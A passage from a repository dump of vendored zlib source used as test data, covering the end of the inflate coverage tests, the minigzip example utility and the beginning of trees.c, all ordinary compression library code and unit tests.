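    try("5 c0 21 d 0 0 0 80 b0 fe 6d 2f 91 6c", "pull 17", 0);
    try("5 e0 81 91 24 cb b2 2c 49 e2 f 2e 8b 9a 47 56 9f fb fe ec d2 ff 1f",
        "long code", 0);
    try("ed c0 1 1 0 0 0 40 20 ff 57 1b 42 2c 4f", "length extra", 0);
    try("ed cf c1 b1 2c 47 10 c4 30 fa 6f 35 1d 1 82 59 3d fb be 2e 2a fc f c",
        "long distance and extra", 0);
    try("ed c0 81 0 0 0 0 80 a0 fd a9 17 a9 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 "
        "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6", "window end", 0);
    inf("2 8 20 80 0 3 0", "inflate_fast TYPE return", 0, -15, 258,
        Z_STREAM_END);
    inf("63 18 5 40 c 0", "window wrap", 3, -8, 300, Z_OK);
}

/* cover remaining lines in inftrees.c */
local void cover_trees(void) {
    int ret;
    unsigned bits;
    unsigned short lens[16], work[16];
    code *next, table[ENOUGH_DISTS];

    /* we need to call inflate_table() directly in order to manifest not-
       enough errors, since zlib insures that enough is always enough */
    for (bits = 0; bits < 15; bits++)
        lens[bits] = (unsigned short)(bits + 1);
    lens[15] = 15;
    next = table;
    bits = 15;
    ret = inflate_table(DISTS, lens, 16, &next, &bits, work);
    assert(ret == 1);
    next = table;
    bits = 1;
    ret = inflate_table(DISTS, lens, 16, &next, &bits, work);
    assert(ret == 1);
    fputs("inflate_table not enough errors\n", stderr);
}

/* cover remaining inffast.c decoding and window copying */
local void cover_fast(void) {
    inf("e5 e0 81 ad 6d cb b2 2c c9 01 1e 59 63 ae 7d ee fb 4d fd b5 35 41 68"
        " ff 7f 0f 0 0 0", "fast length extra bits", 0, -8, 258, Z_DATA_ERROR);
    inf("25 fd 81 b5 6d 59 b6 6a 49 ea af 35 6 34 eb 8c b9 f6 b9 1e ef 67 49"
        " 50 fe ff ff 3f 0 0", "fast distance extra bits", 0, -8, 258,
        Z_DATA_ERROR);
    inf("3 7e 0 0 0 0 0", "fast invalid distance code", 0, -8, 258,
        Z_DATA_ERROR);
    inf("1b 7 0 0 0 0 0", "fast invalid literal/length code", 0, -8, 258,
        Z_DATA_ERROR);
    inf("d c7 1 ae eb 38 c 4 41 a0 87 72 de df fb 1f b8 36 b1 38 5d ff ff 0",
        "fast 2nd level codes and too far back", 0, -8, 258, Z_DATA_ERROR);
    inf("63 18 5 8c 10 8 0 0 0 0", "very common case", 0, -8, 259, Z_OK);
    inf("63 60 60 18 c9 0 8 18 18 18 26 c0 28 0 29 0 0 0",
        "contiguous and wrap around window", 6, -8, 259, Z_OK);
    inf("63 0 3 0 0 0 0 0", "copy direct from output", 0, -8, 259,
        Z_STREAM_END);
}

/* print the zlib version to stderr, then run every coverage group in order */
int main(void) {
    fprintf(stderr, "%s\n", zlibVersion());
    cover_support();
    cover_wrap();
    cover_back();
    cover_inflate();
    cover_trees();
    cover_fast();
    return 0;
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/test/minigzip.c
================================================
/* minigzip.c -- simulate gzip using the zlib compression library
 * Copyright (C) 1995-2006, 2010, 2011, 2016 Jean-loup Gailly
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

/*
 * minigzip is a minimal implementation of the gzip utility. This is
 * only an example of using zlib and isn't meant to replace the
 * full-featured gzip. No attempt is made to deal with file systems
 * limiting names to 14 or 8+3 characters, etc... Error checking is
 * very limited. So use minigzip only for testing; use gzip for the
 * real thing. On MSDOS, use only on file names without extension
 * or in pipe mode.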
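*/

/* @(#) $Id$ */

#include "zlib.h"
#include <stdio.h>

#ifdef STDC
#  include <string.h>
#  include <stdlib.h>
#endif

#ifdef USE_MMAP
#  include <sys/types.h>
#  include <sys/mman.h>
#  include <sys/stat.h>
#endif

#if defined(MSDOS) || defined(OS2) || defined(WIN32) || defined(__CYGWIN__)
#  include <fcntl.h>
#  include <io.h>
#  ifdef UNDER_CE
#    include <stdlib.h>
#  endif
#  define SET_BINARY_MODE(file) setmode(fileno(file), O_BINARY)
#else
#  define SET_BINARY_MODE(file)
#endif

#if defined(_MSC_VER) && _MSC_VER < 1900
#  define snprintf _snprintf
#endif

#ifdef VMS
#  define unlink delete
#  define GZ_SUFFIX "-gz"
#endif
#ifdef RISCOS
#  define unlink remove
#  define GZ_SUFFIX "-gz"
#  define fileno(file) file->__file
#endif
#if defined(__MWERKS__) && __dest_os != __be_os && __dest_os != __win32_os
#  include <unix.h> /* for fileno */
#endif

#if !defined(Z_HAVE_UNISTD_H) && !defined(_LARGEFILE64_SOURCE)
#ifndef WIN32 /* unlink already in stdio.h for WIN32 */
  extern int unlink(const char *);
#endif
#endif

#if defined(UNDER_CE)
#  include <windows.h>
#  define perror(s) pwinerror(s)

/* Map the Windows error number in ERROR to a locale-dependent error
   message string and return a pointer to it.  Typically, the values
   for ERROR come from GetLastError.

   The string pointed to shall not be modified by the application,
   but may be overwritten by a subsequent call to strwinerror

   The strwinerror function does not change the current setting
   of GetLastError.  */
static char *strwinerror(DWORD error) {
    static char buf[1024];

    wchar_t *msgbuf;
    DWORD lasterr = GetLastError();
    DWORD chars = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM
        | FORMAT_MESSAGE_ALLOCATE_BUFFER,
        NULL,
        error,
        0, /* Default language */
        (LPVOID)&msgbuf,
        0,
        NULL);
    if (chars != 0) {
        /* If there is an \r\n appended, zap it.  */
        if (chars >= 2
            && msgbuf[chars - 2] == '\r' && msgbuf[chars - 1] == '\n') {
            chars -= 2;
            msgbuf[chars] = 0;
        }

        /* clamp to what buf can hold, including the terminator */
        if (chars > sizeof (buf) - 1) {
            chars = sizeof (buf) - 1;
            msgbuf[chars] = 0;
        }

        wcstombs(buf, msgbuf, chars + 1);
        /* wcstombs() writes no terminator once the byte limit is reached,
           which can happen when a wide character converts to several bytes */
        buf[sizeof (buf) - 1] = 0;
        LocalFree(msgbuf);
    }
    else {
        /* DWORD is unsigned; convert to match the %ld in the format */
        sprintf(buf, "unknown win32 error (%ld)", (long)error);
    }

    SetLastError(lasterr);
    return buf;
}

/* perror() replacement (see the #define above): print s, when it is a
   non-empty string, followed by the text for GetLastError() */
static void pwinerror(const char *s) {
    if (s && *s)
        fprintf(stderr, "%s: %s\n", s, strwinerror(GetLastError ()));
    else
        fprintf(stderr, "%s\n", strwinerror(GetLastError ()));
}

#endif /* UNDER_CE */

#ifndef GZ_SUFFIX
#  define GZ_SUFFIX ".gz"
#endif
#define SUFFIX_LEN (sizeof(GZ_SUFFIX)-1)

#define BUFLEN      16384
#define MAX_NAME_LEN 1024

#ifdef MAXSEG_64K
#  define local static
   /* Needed for systems with limitation on stack size. */
#else
#  define local
#endif

#ifdef Z_SOLO
/* for Z_SOLO, create simplified gz* functions using deflate and inflate */

#if defined(Z_HAVE_UNISTD_H) || defined(Z_LARGE)
#  include <unistd.h>       /* for unlink() */
#endif

/* zalloc hook: n zero-filled items of m bytes from calloc(); q is unused */
void *myalloc(void *q, unsigned n, unsigned m) {
    (void)q;
    return calloc(n, m);
}

/* zfree hook: release p with free(); q is unused */
void myfree(void *q, void *p) {
    (void)q;
    free(p);
}

/* state of one simplified gz stream */
typedef struct gzFile_s {
    FILE *file;         /* underlying stdio stream */
    int write;          /* non-zero when opened for writing */
    int err;            /* zlib error code recorded for gzerror(), else 0 */
    char *msg;          /* message that goes with err */
    z_stream strm;      /* deflate or inflate state */
} *gzFile;

/* Open a gz stream on path, or on the descriptor fd when path is NULL.  A
   'w' anywhere in mode selects writing, otherwise the stream is read.
   Returns NULL if out of memory, if zlib initialization fails, or if the
   file cannot be opened. */
gzFile gz_open(const char *path, int fd, const char *mode) {
    gzFile gz;
    int ret;

    gz = malloc(sizeof(struct gzFile_s));
    if (gz == NULL)
        return NULL;
    gz->write = strchr(mode, 'w') != NULL;
    gz->strm.zalloc = myalloc;
    gz->strm.zfree = myfree;
    gz->strm.opaque = Z_NULL;
    if (gz->write)
        ret = deflateInit2(&(gz->strm), -1, 8, 15 + 16, 8, 0);
    else {
        /* no input yet: null pointer, zero count */
        gz->strm.next_in = Z_NULL;
        gz->strm.avail_in = 0;
        ret = inflateInit2(&(gz->strm), 15 + 16);
    }
    if (ret != Z_OK) {
        free(gz);
        return NULL;
    }
    gz->file = path == NULL ? fdopen(fd, gz->write ? "wb" : "rb") :
                              fopen(path, gz->write ? "wb" : "rb");
    if (gz->file == NULL) {
        gz->write ? deflateEnd(&(gz->strm)) : inflateEnd(&(gz->strm));
        free(gz);
        return NULL;
    }
    gz->err = 0;
    gz->msg = "";
    return gz;
}

/* open the gz stream named by path */
gzFile gzopen(const char *path, const char *mode) {
    return gz_open(path, -1, mode);
}

/* open a gz stream on an already open descriptor */
gzFile gzdopen(int fd, const char *mode) {
    return gz_open(NULL, fd, mode);
}

/* Compress len bytes from buf to the stream.  Returns len, or 0 if gz is
   NULL, is not open for writing, or the compressed data could not be written
   to the file (gzerror() then reports Z_ERRNO). */
int gzwrite(gzFile gz, const void *buf, unsigned len) {
    z_stream *strm;
    unsigned char out[BUFLEN];
    unsigned produced;

    if (gz == NULL || !gz->write)
        return 0;
    strm = &(gz->strm);
    strm->next_in = (void *)buf;
    strm->avail_in = len;
    do {
        strm->next_out = out;
        strm->avail_out = BUFLEN;
        (void)deflate(strm, Z_NO_FLUSH);
        produced = BUFLEN - strm->avail_out;
        /* a short write means the output file is incomplete; callers remove
           the source after a successful compress, so it must not pass */
        if (fwrite(out, 1, produced, gz->file) != produced) {
            gz->err = Z_ERRNO;
            gz->msg = "write error";
            return 0;
        }
    } while (strm->avail_out == 0);
    return len;
}

/* Decompress up to len bytes into buf.  Returns the number of bytes produced
   (0 at end of file or when gz is NULL or open for writing), or -1 when the
   stream is corrupt or an earlier read already failed. */
int gzread(gzFile gz, void *buf, unsigned len) {
    int ret;
    unsigned got;
    unsigned char in[1];
    z_stream *strm;

    if (gz == NULL || gz->write)
        return 0;
    if (gz->err)
        return -1;
    strm = &(gz->strm);
    strm->next_out = (void *)buf;
    strm->avail_out = len;
    do {
        got = fread(in, 1, 1, gz->file);
        if (got == 0)
            break;
        strm->next_in = in;
        strm->avail_in = 1;
        ret = inflate(strm, Z_NO_FLUSH);
        if (ret == Z_DATA_ERROR) {
            gz->err = Z_DATA_ERROR;
            gz->msg = strm->msg;
            /* report the failure as an error, not as end of input: a caller
               that reads 0 as "done" would accept a truncated output */
            return -1;
        }
        if (ret == Z_STREAM_END)
            inflateReset(strm);     /* allow a following gzip member */
    } while (strm->avail_out);
    return len - strm->avail_out;
}

/* Finish the stream, close the file and free gz.  Returns Z_OK, Z_STREAM_ERROR
   if gz is NULL, or Z_ERRNO if the remaining output could not be written or
   the file could not be closed. */
int gzclose(gzFile gz) {
    z_stream *strm;
    unsigned char out[BUFLEN];
    unsigned produced;
    int status = Z_OK;

    if (gz == NULL)
        return Z_STREAM_ERROR;
    strm = &(gz->strm);
    if (gz->write) {
        strm->next_in = Z_NULL;
        strm->avail_in = 0;
        do {
            strm->next_out = out;
            strm->avail_out = BUFLEN;
            (void)deflate(strm, Z_FINISH);
            produced = BUFLEN - strm->avail_out;
            if (fwrite(out, 1, produced, gz->file) != produced) {
                status = Z_ERRNO;
                break;
            }
        } while (strm->avail_out == 0);
        deflateEnd(strm);
    }
    else
        inflateEnd(strm);
    /* buffered data is flushed here, so a failed close is a failed write */
    if (fclose(gz->file) != 0)
        status = Z_ERRNO;
    free(gz);
    return status;
}

/* return the message recorded on gz and store its error code in *err */
const char *gzerror(gzFile gz, int *err) {
    *err = gz->err;
    return gz->msg;
}

#endif

static char *prog;      /* program name used in messages, set by main() */

/* ===========================================================================
 * Display error message and exit
 */
void error(const char *msg) {
    fprintf(stderr, "%s: %s\n", prog, msg);
    exit(1);
}

#ifdef USE_MMAP /*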
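MMAP version, Miguel Albrecht */

/* Try compressing the input file at once using mmap. Return Z_OK on
 * success, Z_ERRNO otherwise.  Z_ERRNO is returned before anything is
 * written, so the caller can fall back to reading the file in pieces.
 * On success both in and out have been closed.
 */
int gz_compress_mmap(FILE *in, gzFile out) {
    int len;
    int err;
    int ifd = fileno(in);
    caddr_t buf;    /* mmap'ed buffer for the entire input file */
    off_t buf_len;  /* length of the input file */
    struct stat sb;

    /* Determine the size of the file, needed for mmap: */
    if (fstat(ifd, &sb) < 0) return Z_ERRNO;
    buf_len = sb.st_size;
    if (buf_len <= 0) return Z_ERRNO;

    /* The length is passed to gzwrite() as an unsigned and the result is
     * compared as an int.  A larger file would be cut down by those
     * conversions and could still compare equal, leaving a short archive
     * that looks complete, so leave such files to the fread loop.
     */
    if (buf_len > (off_t)((unsigned)-1 >> 1)) return Z_ERRNO;

    /* Now do the actual mmap: */
    buf = mmap((caddr_t) 0, buf_len, PROT_READ, MAP_SHARED, ifd, (off_t)0);
    if (buf == (caddr_t)(-1)) return Z_ERRNO;

    /* Compress the whole file at once: */
    len = gzwrite(out, (char *)buf, (unsigned)buf_len);

    if (len != (int)buf_len) error(gzerror(out, &err));

    munmap(buf, buf_len);
    fclose(in);
    if (gzclose(out) != Z_OK) error("failed gzclose");
    return Z_OK;
}
#endif /* USE_MMAP */

/* ===========================================================================
 * Compress input to output then close both files.
 * Any read, write or close failure ends the program through error() or
 * exit(), so a return means the whole input was compressed.
 */
void gz_compress(FILE *in, gzFile out) {
    local char buf[BUFLEN];
    int len;
    int err;

#ifdef USE_MMAP
    /* Try first compressing with mmap. If mmap fails (minigzip used in a
     * pipe), use the normal fread loop.
     */
    if (gz_compress_mmap(in, out) == Z_OK) return;
#endif
    for (;;) {
        len = (int)fread(buf, 1, sizeof(buf), in);
        if (ferror(in)) {
            perror("fread");
            exit(1);
        }
        if (len == 0) break;

        if (gzwrite(out, buf, (unsigned)len) != len) error(gzerror(out, &err));
    }
    fclose(in);
    if (gzclose(out) != Z_OK) error("failed gzclose");
}

/* ===========================================================================
 * Uncompress input to output then close both files.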
*/
void gz_uncompress(gzFile in, FILE *out) {
    local char chunk[BUFLEN];
    int got;
    int zerr;

    /* gzread() returns 0 at end of input and a negative value on error;
     * error() does not return
     */
    while ((got = gzread(in, chunk, sizeof(chunk))) != 0) {
        if (got < 0)
            error (gzerror(in, &zerr));
        if ((int)fwrite(chunk, 1, (unsigned)got, out) != got)
            error("failed fwrite");
    }

    if (fclose(out))
        error("failed fclose");
    if (gzclose(in) != Z_OK)
        error("failed gzclose");
}


/* ===========================================================================
 * Compress the given file: create a corresponding .gz file and remove the
 * original.
 * The output name is the input name followed by GZ_SUFFIX, and it must fit
 * in MAX_NAME_LEN bytes including the terminator.  The original is removed
 * only after gz_compress() returns, and gz_compress() exits on failure.
 */
void file_compress(char *file, char *mode) {
    local char gzname[MAX_NAME_LEN];
    FILE *src;
    gzFile dst;

    /* check the combined length before anything is copied into gzname */
    if (strlen(file) + strlen(GZ_SUFFIX) >= sizeof(gzname)) {
        fprintf(stderr, "%s: filename too long\n", prog);
        exit(1);
    }

#if !defined(NO_snprintf) && !defined(NO_vsnprintf)
    snprintf(gzname, sizeof(gzname), "%s%s", file, GZ_SUFFIX);
#else
    strcpy(gzname, file);
    strcat(gzname, GZ_SUFFIX);
#endif

    src = fopen(file, "rb");
    if (src == NULL) {
        perror(file);
        exit(1);
    }

    dst = gzopen(gzname, mode);
    if (dst == NULL) {
        fprintf(stderr, "%s: can't gzopen %s\n", prog, gzname);
        exit(1);
    }

    gz_compress(src, dst);
    unlink(file);
}


/* ===========================================================================
 * Uncompress the given file and remove the original.
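*/
/* file is the name given on the command line.  When it ends in GZ_SUFFIX it
 * is taken as the compressed input and the output name is the same name
 * without the suffix; otherwise it is taken as the output name and the
 * input is that name with GZ_SUFFIX appended.  The output is opened with
 * "wb", which truncates a file that already exists at that name.  The
 * input is removed after gz_uncompress() returns.
 */
void file_uncompress(char *file) {
    local char buf[MAX_NAME_LEN];
    char *infile, *outfile;
    FILE *out;
    gzFile in;
    z_size_t len = strlen(file);

    /* room for the name, a possible suffix and the terminator */
    if (len + strlen(GZ_SUFFIX) >= sizeof(buf)) {
        fprintf(stderr, "%s: filename too long\n", prog);
        exit(1);
    }

#if !defined(NO_snprintf) && !defined(NO_vsnprintf)
    snprintf(buf, sizeof(buf), "%s", file);
#else
    strcpy(buf, file);
#endif

    if (len > SUFFIX_LEN && strcmp(file+len-SUFFIX_LEN, GZ_SUFFIX) == 0) {
        infile = file;
        outfile = buf;
        /* cut off exactly the suffix that was matched above; GZ_SUFFIX can
         * be defined by the build, so its length is not assumed
         */
        outfile[len-SUFFIX_LEN] = '\0';
    } else {
        outfile = file;
        infile = buf;
#if !defined(NO_snprintf) && !defined(NO_vsnprintf)
        snprintf(buf + len, sizeof(buf) - len, "%s", GZ_SUFFIX);
#else
        strcat(infile, GZ_SUFFIX);
#endif
    }
    in = gzopen(infile, "rb");
    if (in == NULL) {
        fprintf(stderr, "%s: can't gzopen %s\n", prog, infile);
        exit(1);
    }
    out = fopen(outfile, "wb");
    if (out == NULL) {
        /* name the file that could not be opened, which is the output */
        perror(outfile);
        exit(1);
    }

    gz_uncompress(in, out);

    unlink(infile);
}


/* ===========================================================================
 * Usage:  minigzip [-c] [-d] [-f] [-h] [-r] [-1 to -9] [files...]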
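*   -c : write to standard output
 *   -d : decompress
 *   -f : compress with Z_FILTERED
 *   -h : compress with Z_HUFFMAN_ONLY
 *   -r : compress with Z_RLE
 *   -1 to -9 : compression level
 *
 * A program name of "gunzip" implies -d and "zcat" implies -c -d.  With no
 * file arguments, standard input is processed to standard output.
 */
int main(int argc, char *argv[]) {
    static char fallback_name[] = "minigzip";
    int copyout = 0;
    int uncompr = 0;
    gzFile file;
    char *bname, outmode[20];

#if !defined(NO_snprintf) && !defined(NO_vsnprintf)
    snprintf(outmode, sizeof(outmode), "%s", "wb6 ");
#else
    strcpy(outmode, "wb6 ");
#endif

    if (argc < 1 || argv[0] == NULL) {
        /* A caller may start the program with an empty argument vector.
         * argv[0] is then a null pointer, and stepping argc below zero
         * would send the file loop past the end of argv.  Treat this as
         * a run without arguments.
         */
        prog = fallback_name;
        bname = fallback_name;
        argc = 0;
    } else {
        prog = argv[0];
        bname = strrchr(argv[0], '/');
        if (bname)
            bname++;
        else
            bname = argv[0];
        argc--, argv++;
    }

    if (!strcmp(bname, "gunzip"))
        uncompr = 1;
    else if (!strcmp(bname, "zcat"))
        copyout = uncompr = 1;

    /* options come first; the first argument that is not one ends them */
    while (argc > 0) {
        if (strcmp(*argv, "-c") == 0)
            copyout = 1;
        else if (strcmp(*argv, "-d") == 0)
            uncompr = 1;
        else if (strcmp(*argv, "-f") == 0)
            outmode[3] = 'f';
        else if (strcmp(*argv, "-h") == 0)
            outmode[3] = 'h';
        else if (strcmp(*argv, "-r") == 0)
            outmode[3] = 'R';
        else if ((*argv)[0] == '-' && (*argv)[1] >= '1' && (*argv)[1] <= '9' &&
                 (*argv)[2] == 0)
            outmode[2] = (*argv)[1];
        else
            break;
        argc--, argv++;
    }
    /* no strategy letter was chosen: end the mode string after the level */
    if (outmode[3] == ' ')
        outmode[3] = 0;
    if (argc == 0) {
        SET_BINARY_MODE(stdin);
        SET_BINARY_MODE(stdout);
        if (uncompr) {
            file = gzdopen(fileno(stdin), "rb");
            if (file == NULL) error("can't gzdopen stdin");
            gz_uncompress(file, stdout);
        } else {
            file = gzdopen(fileno(stdout), outmode);
            if (file == NULL) error("can't gzdopen stdout");
            gz_compress(stdin, file);
        }
    } else {
        if (copyout) {
            SET_BINARY_MODE(stdout);
        }
        do {
            if (uncompr) {
                if (copyout) {
                    file = gzopen(*argv, "rb");
                    if (file == NULL)
                        fprintf(stderr, "%s: can't gzopen %s\n", prog, *argv);
                    else
                        gz_uncompress(file, stdout);
                } else {
                    file_uncompress(*argv);
                }
            } else {
                if (copyout) {
                    FILE * in = fopen(*argv, "rb");

                    if (in == NULL) {
                        perror(*argv);
                    } else {
                        file = gzdopen(fileno(stdout), outmode);
                        if (file == NULL) error("can't gzdopen stdout");

                        gz_compress(in, file);
                    }

                } else {
                    file_compress(*argv, outmode);
                }
            }
        } while (argv++, --argc);
    }
    return 0;
}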
================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/treebuild.xml ================================================ zip compression library ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/trees.c ================================================ /* trees.c -- output deflated data using Huffman coding * Copyright (C) 1995-2021 Jean-loup Gailly * detect_data_type() function provided freely by Cosmin Truta, 2006 * For conditions of distribution and use, see copyright notice in zlib.h */ /* * ALGORITHM * * The "deflation" process uses several Huffman trees. The more * common source values are represented by shorter bit sequences. * * Each code tree is stored in a compressed form which is itself * a Huffman encoding of the lengths of all the code strings (in * ascending order by source values). The actual code strings are * reconstructed from the lengths in the inflate process, as described * in the deflate specification. * * REFERENCES * * Deutsch, L.P.,"'Deflate' Compressed Data Format Specification". * Available in ftp.uu.net:/pub/archiving/zip/doc/deflate-1.1.doc * * Storer, James A. * Data Compression: Methods and Theory, pp. 49-50. * Computer Science Press, 1988. ISBN 0-7167-8156-5. * * Sedgewick, R. * Algorithms, p290. * Addison-Wesley, 1983. ISBN 0-201-06672-6. 
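*/

/* @(#) $Id$ */

/* #define GEN_TREES_H */

#include "deflate.h"

#ifdef ZLIB_DEBUG
#  include <ctype.h>    /* isgraph() used by the trace output below */
#endif

/* ===========================================================================
 * Constants
 */

#define MAX_BL_BITS 7
/* Bit length codes must not exceed MAX_BL_BITS bits */

#define END_BLOCK 256
/* end of block literal code */

#define REP_3_6 16
/* repeat previous bit length 3-6 times (2 bits of repeat count) */

#define REPZ_3_10 17
/* repeat a zero length 3-10 times (3 bits of repeat count) */

#define REPZ_11_138 18
/* repeat a zero length 11-138 times (7 bits of repeat count) */

local const int extra_lbits[LENGTH_CODES] /* extra bits for each length code */
   = {0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0};

local const int extra_dbits[D_CODES] /* extra bits for each distance code */
   = {0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13};

local const int extra_blbits[BL_CODES]/* extra bits for each bit length code */
   = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7};

local const uch bl_order[BL_CODES]
   = {16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15};
/* The lengths of the bit length codes are sent in order of decreasing
 * probability, to avoid transmitting the lengths for unused bit length codes.
 */

/* ===========================================================================
 * Local data. These are initialized only once.
 */

#define DIST_CODE_LEN 512 /* see definition of array dist_code below */

#if defined(GEN_TREES_H) || !defined(STDC)
/* non ANSI compilers may not accept trees.h */

local ct_data static_ltree[L_CODES+2];
/* The static literal tree. Since the bit lengths are imposed, there is no
 * need for the L_CODES extra codes used during heap construction. However
 * The codes 286 and 287 are needed to build a canonical tree (see _tr_init
 * below).
 */

local ct_data static_dtree[D_CODES];
/* The static distance tree. (Actually a trivial tree since all codes use
 * 5 bits.)
 */

uch _dist_code[DIST_CODE_LEN];
/* Distance codes. The first 256 values correspond to the distances
 * 3 .. 258, the last 256 values correspond to the top 8 bits of
 * the 15 bit distances.
 */

uch _length_code[MAX_MATCH-MIN_MATCH+1];
/* length code for each normalized match length (0 == MIN_MATCH) */

local int base_length[LENGTH_CODES];
/* First normalized length for each code (0 = MIN_MATCH) */

local int base_dist[D_CODES];
/* First normalized distance for each code (0 = distance of 1) */

#else
#  include "trees.h"
#endif /* GEN_TREES_H */

struct static_tree_desc_s {
    const ct_data *static_tree;  /* static tree or NULL */
    const intf *extra_bits;      /* extra bits for each code or NULL */
    int extra_base;              /* base index for extra_bits */
    int elems;                   /* max number of elements in the tree */
    int max_length;              /* max bit length for the codes */
};

#ifdef NO_INIT_GLOBAL_POINTERS
#  define TCONST
#else
#  define TCONST const
#endif

local TCONST static_tree_desc static_l_desc =
{static_ltree, extra_lbits, LITERALS+1, L_CODES, MAX_BITS};

local TCONST static_tree_desc static_d_desc =
{static_dtree, extra_dbits, 0, D_CODES, MAX_BITS};

local TCONST static_tree_desc static_bl_desc =
{(const ct_data *)0, extra_blbits, 0, BL_CODES, MAX_BL_BITS};

/* ===========================================================================
 * Output a short LSB first on the stream.
 * IN assertion: there is enough room in pendingBuf.
 * The macro itself performs no bounds check; it is two put_byte() calls and
 * relies entirely on the caller having reserved the space.
 */
#define put_short(s, w) { \
    put_byte(s, (uch)((w) & 0xff)); \
    put_byte(s, (uch)((ush)(w) >> 8)); \
}

/* ===========================================================================
 * Reverse the first len bits of a code, using straightforward code (a faster
 * method would use a table)
 * IN assertion: 1 <= len <= 15
 * The loop is a do/while, so a len of 0 or less still processes one bit.
 */
local unsigned bi_reverse(unsigned code, int len) {
    register unsigned res = 0;
    do {
        res |= code & 1;
        code >>= 1, res <<= 1;
    } while (--len > 0);
    return res >> 1;    /* undo the extra shift made in the last iteration */
}

/* ===========================================================================
 * Flush the bit buffer, keeping at most 7 bits in it.
 */
local void bi_flush(deflate_state *s) {
    if (s->bi_valid == 16) {
        put_short(s, s->bi_buf);
        s->bi_buf = 0;
        s->bi_valid = 0;
    } else if (s->bi_valid >= 8) {
        put_byte(s, (Byte)s->bi_buf);
        s->bi_buf >>= 8;
        s->bi_valid -= 8;
    }
}

/* ===========================================================================
 * Flush the bit buffer and align the output on a byte boundary
 */
local void bi_windup(deflate_state *s) {
    if (s->bi_valid > 8) {
        put_short(s, s->bi_buf);
    } else if (s->bi_valid > 0) {
        put_byte(s, (Byte)s->bi_buf);
    }
    s->bi_buf = 0;
    s->bi_valid = 0;
#ifdef ZLIB_DEBUG
    s->bits_sent = (s->bits_sent + 7) & ~7;    /* round up to a whole byte */
#endif
}

/* ===========================================================================
 * Generate the codes for a given tree and bit counts (which need not be
 * optimal).
 * IN assertion: the array bl_count contains the bit length statistics for
 * the given tree and the field len is set for all tree elements.
 * OUT assertion: the field code is set for all tree elements of non
 * zero code length.
 * tree[n].Len is used to index next_code[MAX_BITS+1] without a range check,
 * so the caller must have limited every Len to MAX_BITS.
 */
local void gen_codes(ct_data *tree, int max_code, ushf *bl_count) {
    ush next_code[MAX_BITS+1]; /* next code value for each bit length */
    unsigned code = 0;         /* running code value */
    int bits;                  /* bit index */
    int n;                     /* code index */

    /* The distribution counts are first used to generate the code values
     * without bit reversal.
     */
    for (bits = 1; bits <= MAX_BITS; bits++) {
        code = (code + bl_count[bits - 1]) << 1;
        next_code[bits] = (ush)code;
    }
    /* Check that the bit counts in bl_count are consistent. The last code
     * must be all ones.
     */
    Assert (code + bl_count[MAX_BITS] - 1 == (1 << MAX_BITS) - 1,
            "inconsistent bit counts");
    Tracev((stderr,"\ngen_codes: max_code %d ", max_code));

    for (n = 0; n <= max_code; n++) {
        int len = tree[n].Len;
        if (len == 0) continue;
        /* Now reverse the bits */
        tree[n].Code = (ush)bi_reverse(next_code[len]++, len);

        Tracecv(tree != static_ltree, (stderr,"\nn %3d %c l %2d c %4x (%x) ",
            n, (isgraph(n) ? n : ' '), len, tree[n].Code, next_code[len] - 1));
    }
}

#ifdef GEN_TREES_H
local void gen_trees_header(void);
#endif

#ifndef ZLIB_DEBUG
#  define send_code(s, c, tree) send_bits(s, tree[c].Code, tree[c].Len)
   /* Send a code of the given tree. c and tree must not have side effects */

#else /* !ZLIB_DEBUG */
#  define send_code(s, c, tree) \
     { if (z_verbose>2) fprintf(stderr,"\ncd %3d ",(c)); \
       send_bits(s, tree[c].Code, tree[c].Len); }
#endif

/* ===========================================================================
 * Send a value on a given number of bits.
 * IN assertion: length <= 16 and value fits in length bits.
 * Both variants may call put_short(), so the pending buffer must have room
 * for two more bytes.
 */
#ifdef ZLIB_DEBUG
local void send_bits(deflate_state *s, int value, int length) {
    Tracevv((stderr," l %2d v %4x ", length, value));
    Assert(length > 0 && length <= 15, "invalid length");
    s->bits_sent += (ulg)length;

    /* If not enough room in bi_buf, use (valid) bits from bi_buf and
     * (16 - bi_valid) bits from value, leaving (width - (16 - bi_valid))
     * unused bits in value.
     */
    if (s->bi_valid > (int)Buf_size - length) {
        s->bi_buf |= (ush)value << s->bi_valid;
        put_short(s, s->bi_buf);
        s->bi_buf = (ush)value >> (Buf_size - s->bi_valid);
        s->bi_valid += length - Buf_size;
    } else {
        s->bi_buf |= (ush)value << s->bi_valid;
        s->bi_valid += length;
    }
}
#else /* !ZLIB_DEBUG */

#define send_bits(s, value, length) \
{ int len = length;\
  if (s->bi_valid > (int)Buf_size - len) {\
    int val = (int)value;\
    s->bi_buf |= (ush)val << s->bi_valid;\
    put_short(s, s->bi_buf);\
    s->bi_buf = (ush)val >> (Buf_size - s->bi_valid);\
    s->bi_valid += len - Buf_size;\
  } else {\
    s->bi_buf |= (ush)(value) << s->bi_valid;\
    s->bi_valid += len;\
  }\
}
#endif /* ZLIB_DEBUG */


/* the arguments must not have side effects */

/* ===========================================================================
 * Initialize the various 'constant' tables.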
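*/
/* The body is compiled only when GEN_TREES_H is defined or STDC is not;
 * otherwise the tables come precomputed from trees.h and this function is
 * empty. Repeat calls return early on a plain static flag; no locking is
 * visible here.
 */
local void tr_static_init(void) {
#if defined(GEN_TREES_H) || !defined(STDC)
    static int static_init_done = 0;
    int n;        /* iterates over tree elements */
    int bits;     /* bit counter */
    int length;   /* length value */
    int code;     /* code value */
    int dist;     /* distance index */
    ush bl_count[MAX_BITS+1];
    /* number of codes at each bit length for an optimal tree */

    if (static_init_done) return;

    /* For some embedded targets, global variables are not initialized: */
#ifdef NO_INIT_GLOBAL_POINTERS
    static_l_desc.static_tree = static_ltree;
    static_l_desc.extra_bits = extra_lbits;
    static_d_desc.static_tree = static_dtree;
    static_d_desc.extra_bits = extra_dbits;
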